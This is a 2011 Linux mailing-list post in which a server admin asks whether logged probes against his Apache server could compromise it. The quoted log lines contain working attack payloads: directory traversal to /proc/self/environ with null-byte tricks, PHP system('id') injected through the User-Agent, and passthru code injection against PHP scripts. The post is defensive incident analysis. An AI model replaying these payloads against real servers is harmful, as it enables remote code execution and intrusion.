Re: Possible successful probe?

David Guntner <davidg-1boXBf7wef/[email protected]> Mon, 12 Dec 2011 07:37:20 -0800
Newsgroups gmane.linux.mandrake.expert
Organization What a concept! :-)
Message-ID <[email protected]>
This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enig9CBE9BCF5FD2FBA396623202
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

On 12/12/2011 07:29 AM, David Guntner wrote:
> Still running my semi-crippled 2011 install - haven't had a chance to d=
o
> anything about that, yet.... :-)
>=20
> Anyway, this morning's security run reported the following:
>=20
>>  A total of 3 possible successful probes were detected (the following =
URLs
>>  contain strings that match one or more of a listing of strings that
>>  indicate a possible exploit):
>> =20
>>     /?file=3D../../../../../../proc/self/environ%00 HTTP Response 200 =

>>     /?mod=3D../../../../../../proc/self/environ%00 HTTP Response 200=20
>>     /?page=3D../../../../../../proc/self/environ%00 HTTP Response 200 =

>=20
> That's all it says, so I'm not sure what the reset of the URL was.
> Question is, is the above anything I need to worry about?  Is there
> going to be any information that they could get from the above that
> might allow them to compromise my machine?

As a followup, I checked the access log for Apache and found the
following, more complete information:

> mail.rostcom.net - - [11/Dec/2011:13:16:14 -0800] "GET /awstatstotals/a=
wstatstotals.php?sort=3D%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%=
7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 990 "-" "Mozilla/5.0 (Wind
> ows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
> mail.rostcom.net - - [11/Dec/2011:13:16:14 -0800] "GET /?file=3D../../.=
=2E/../../../proc/self/environ%00 HTTP/1.1" 200 4186 "-" "<?php system(\"=
id\"); ?>"
> mail.rostcom.net - - [11/Dec/2011:13:16:14 -0800] "GET /?page=3D../../.=
=2E/../../../proc/self/environ%00 HTTP/1.1" 200 4186 "-" "<?php system(\"=
id\"); ?>"
> mail.rostcom.net - - [11/Dec/2011:13:16:14 -0800] "GET /?mod=3D../../..=
/../../../proc/self/environ%00 HTTP/1.1" 200 4186 "-" "<?php system(\"id\=
"); ?>"
> mail.rostcom.net - - [11/Dec/2011:13:16:15 -0800] "GET /index.php?optio=
n=3Dcom_simpledownload&controller=3D../../../../../../../../../../../../.=
=2E/../../proc/self/environ%00 HTTP/1.1" 404 990 "-" "<?php system(\"id\"=
); ?>"
> mail.rostcom.net - - [11/Dec/2011:13:16:15 -0800] "GET /site.php?a=3D{%=
24{passthru%28chr%28105%29.chr%28100%29%29}} HTTP/1.1" 404 990 "-" "Mozil=
la/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"

=46rom the 404s at the end, it looks like whatever they were trying to do=

at that point failed.  But I'm still a bit concerned about the 3 200s
leading up to it.  So the question stands:  Is there anything there that
someone could use to compromise the system?

                       --Dave


--------------enig9CBE9BCF5FD2FBA396623202
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAk7mH7AACgkQvC3peSYrMN6MqgCfXSTu6SgTa6vzH1MWNxjgA1KU
jUMAnjejV15DKmIZLXMGkBbvNX1UrVga
=V+r9
-----END PGP SIGNATURE-----

--------------enig9CBE9BCF5FD2FBA396623202--